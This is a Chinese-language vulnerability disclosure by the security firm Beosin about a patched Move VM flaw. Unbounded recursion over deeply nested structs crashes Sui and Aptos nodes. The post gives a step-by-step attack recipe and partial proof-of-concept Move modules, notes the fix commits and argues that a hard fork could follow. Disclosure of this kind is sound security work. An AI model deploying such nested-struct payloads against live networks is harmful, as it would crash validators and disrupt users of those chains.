Beosin 发现 Move VM 严重级别漏洞：可导致 Sui、Aptos 等公链全网崩溃，甚至可能硬分叉

一个小小的递归函数调用，就导致栈溢出，而栈溢出又导致整个网络崩溃（total network shutdown），再利用一些攻击手段，很可能使区块链产生硬分叉。

作者：Poet，Beosin 安全专家

封面：Photo by Armand Khoury on Unsplash

目前该漏洞已被官方修复。Suimainnet_v1.2.1、Aptosmainnet_v1.4.3、Move 语言 2023 年 6 月 10 日之后的版本修复了此漏洞。

前言

Move 是一个新的区块链语言，被 Aptos、Sui 等公链使用。近期我们 Beosin 安全研究团队发现了一个递归调用导致的栈溢出漏洞，这个漏洞可以导致整个网络崩溃（total network shutdown），还会导致新的 validator 无法加入到网络中，甚至可能会导致硬分叉！
我们在发现并验证这个漏洞后，第一时间（2023 年 5 月 30 日）通过邮件与 Sui 团队取得联系，随后在他们的建议下，将漏洞提交到了 Immunefi 漏洞赏金平台（2023 年 6 月 2 日）。

不过在我们提交漏洞之后，官方团队回复称他们于一个月前内部发现了该问题，并在秘密进行安全修复，并于我们提交 immunefi 的当天发布了修复版本（2023 年 6 月 2 日）。我们理解并尊重他们的回复。

当前版本该漏洞已修复，所以我们现在公开我们的研究发现。作为区块链安全行业的领先者，我们持续关注区块链生态的安全。

知识前提

Move 虚拟机是由 Rust 语言编写实现。Move 代码组织（和分发）的主要单位是 Package。Package 由一组 module 组成，这些 module 定义在单独的文件中，扩展名为 .move。这些文件包括 Move 函数和类型定义。

最小包源目录结构如下所示，包含清单文件、锁定文件和一个或多个模块文件所在的 sources 子目录：

my_move_package：
    ├── Move.lock
    ├── Move.toml
    ├── sources
        ├── my_module.move

Package 可以被 Publish 到区块链上。一个 Package 可以包含多个 Module，一个 Module 可以包含多个函数、结构体。

函数的参数可以是结构体，结构体可以内嵌其他结构体，如下所示：

module helloworld::hello {    struct CCC {         c : u64    }}
module my_module::my_module{    struct BBB {        b : helloworld::hello::CCC    }
    struct AAA {         a : BBB    }
    public fun mint( c_param : helloworld::hello::CCC ){        let a1 = AAA {            a : BBB {                b : c_param            }        };
        let a2 = AAA {            a : BBB {                b : helloworld::hello::CCC {                    c : 0x555                }            }        };    }}

在 Rust 编程语言里面，递归函数调用的时候，如果没有限制调用深度，会导致栈溢出或者 cpu、内存等资源的耗尽。Move 虚拟机正是由 Rust 语言编写。

漏洞描述

在 Move 虚拟机里面，为了处理各种结构化数据（比如序列化数据、结构体嵌套、数组嵌套、泛型嵌套），经常会用到递归函数。为了防止由于递归调用导致的栈溢出，需要对递归调用的深度进行检查。如下所示：

上面的图片是 Move 虚拟机限制简单和复杂类型结构的解析深度

上面的图片是 Move 虚拟机对字节码里面 SIGNATURE_TOKEN 深度的限制。

尽管 Move 虚拟机在很多地方都有递归调用深度检查，但是它仍然有某些情况没有考虑到。

我们现在考虑一种攻击方式：定义一个 struct A，然后 A 嵌套 struct B，然后 B 嵌套 struct C.... 这样一直嵌套下去，如果 Move 虚拟机是用一个递归函数来处理这种嵌套关系，那么 Move 虚拟机会因为栈溢出或者资源不足而崩溃。尽管 Move 对每个 module 可以定义的 struct 数量有限制，但是我们可以创建无数个 module。

这样我们就有了攻击思路：

1、生成 25 个（完全可以比 25 多）package，每个 package 包含 1 个 module

2、每个 module 里面定义 64 个（Aptos 里面可以比 64 多）有链式嵌套关系的 struct，每个 module 里的第一个 struct，嵌套上一个 module 里面的最后一个 struct。

3、每个 module 里面包含一个可调用的 entry 函数。这个函数接受一个参数，这个参数类型是上一个 module 的最后一个 struct（第 64 个 struct）。这个函数创建并返回本 module 的最后一个 struct 实例（第 64 个 struct）

4、按照顺序 publish 每个 package

5、按照顺序调用每个 module 里面的 entry 函数

针对 Sui mainnet_v1.1.1_，我们测试后发现如下现象（我们的测试环境有 4 个 validator）：

1、运行一次 poc 之后，4 个 validator 会因为栈溢出马上崩溃

2、至少 3 个 validator 崩溃重启后，所有的 fullnode 会崩溃

3、至少 3 个 validator 崩溃重启后，新的 validator 加入时会崩溃至少 1 次

4、至少 3 个 validator 崩溃重启后，新的 fullnode 加入时有时候会崩溃 1 次

5、如果运气好的话，某些 validator、fullnode 崩溃后无法重启，只有删除本地所有数据库，才能重启

针对 Sui mainnet_v1.2.0，我们测试后发现如下现象（我们的测试环境有 4 个 validator）：

1、运行一次 poc 之后，至少有 1 个 validator 会因为栈溢出或者 out of memory 而崩溃；

2、再次运行一次 poc，可以让第 2 个 validator 崩溃。然后整个网络无法接受新的交易；

3、崩溃后的 validator 有可能无法重启。删除这个 validator 的所有本地数据库，然后运行它，它会在一段时间后崩溃，而且再也无法重启；

4、新的 validator 加入网络的时候，会崩溃。

我们简单测试了 Aptos，发现 Aptos 也会崩溃：

PoC

Sui 链的 PoC

module hello_world_2::hello{   use std::string;   use sui::object::{Self, UID};   use sui::transfer;   use sui::tx_context::{Self, TxContext};
    struct T_0  has key,store{         id : UID,        m : hello_world_1::hello::T_63    }    struct T_1 has key,store{         id : UID,        m : T_0     }
........other not printed.........
    struct T_62 has key,store{         id : UID,        m : T_61     }    struct T_63 has key,store{         id : UID,        m : T_62     }    public entry fun mint(previous: hello_world_1::hello::T_63 ,ctx: &mut TxContext) {        let object = T_63{        id: object::new(ctx),        m : T_62{        id: object::new(ctx),        m : T_61{        id: object::new(ctx),
........other not printed.........
        m : T_1{        id: object::new(ctx),        m : T_0{        id: object::new(ctx),        m : previous}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}};        transfer::transfer(object, tx_context::sender(ctx));    }}

每创建一个这样的 module，就 Publish 到 Sui 链上，并调用 mint 函数，获取它创建的"object"，同时将"object"作为参数传递给下一个 module 的 mint 函数，直到 Sui 节点崩溃

Aptos 链的 PoC

module Test2::test_module2{    struct Struct0  has key,store,drop {    m : Test1::test_module1::Struct200  }  struct Struct1  has key,store,drop{    m : Struct0   }  ........other not printed.........
    struct Struct199  has key,store,drop{    m : Struct198   }            struct Struct200  has key,store,drop{    m : Struct199   }          public entry fun mint(_account : signer){        let previous0 = 5554444;    let previous1 = Test0::test_module0::test_function(previous0);    let previous2 = Test1::test_module1::test_function(previous1);    let _current = test_function(previous2);  }  public fun test_function(previous : Test1::test_module1::Struct200) : Struct200{    let object = Struct200{        m:Struct199{........other not printed.........        m:Struct1{        m:Struct0{        m:previous}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}};    object  }}

每创建一个这样的 module，就 Publish 到 Aptos 链上，并调用 mint 函数，直到 Aptos 节点崩溃。

漏洞修复

Sui mainnet_v1.2.1（2023 年 6 月 2 号）、Aptos mainnet_v1.4.3（2023 年 6 月 3 号）、Move 语言 2023 年 6 月 10 日之后的版本修复了此漏洞。

Sui 补丁代码：

https://github.com/MystenLabs/sui/commit/8b681515c0cf435df2a54198a28ab4ef574d202b

补丁代码在创建 struct、vec、generic 的地方，对类型引用深度作了限制。增加的关键函数是”check_depth_of_type”。

Aptos 补丁代码：

https://github.com/aptos-labs/aptos-core/commit/47a0391c612407fe0b1051ef658a29e35d986963

和 Sui 一样，补丁代码在创建 struct、vec、generic 的地方，对类型引用深度作了限制。增加的关键函数是”check_depth_of_type”。

Move 语言补丁代码：

https://github.com/move-language/move/commit/8f5303a365cf9da7554f8f18c393b3d6eb4867f2

和 Sui、Aptos 一样，补丁代码在创建 struct、vec、generic 的地方，对类型引用深度作了限制。增加的关键函数是”check_depth_of_type”。

漏洞影响

这个漏洞利用非常简单，而且一次攻击消耗的 gas 也非常小。但是该漏洞的影响非常大，可以导致整个网络崩溃（total network shutdown），还会让新的 validator 无法加入到网络中，甚至可能导致硬分叉（hard fork）。Sui mainnet_v1.2.1、Aptos mainnet_v1.4.3 以前的版本都受此漏洞影响。

为什么这个漏洞有可能会导致硬分叉？

1、恶意攻击者可以创建任意深度的结构体嵌套关系，并将这些恶意 struct 部署到链上。然后针对这些结构体发送一些不可改变的恶意交易，虽然这个过程中可能会导致网络崩溃，但是部分恶意交易还是会被已经被部署到链上了。

2、为了修补这个漏洞，我们可以限制递归调用的深度。但是这样我们就再也无法引用已经部署到区块链上的的恶意结构体，也无法在虚拟机里面验证与恶意 struct 相关的历史交易。只有硬分叉才能解决这种问题。
3、由于导致硬分叉的测试对现行网络影响过于严重，我们放弃了该测试，但理论上我们认为可行。

总结

一个小小的递归函数调用，就导致栈溢出，而栈溢出又导致整个网络崩溃（total network shutdown），再利用一些攻击手段，很可能使区块链产生硬分叉。所以，区块链的安全是永远排在第一位的。我们建议项目方要多注意这种类型的漏洞，最好是找专业的区块链安全机构进行全面的审计。

免责声明：作为区块链信息平台，本站所发布文章仅代表作者及嘉宾个人观点，与 Web3Caff 立场无关。本文内容仅用于信息分享，均不构成任何投资建议及要约，并请您遵守所在国家或地区的相关法律法规。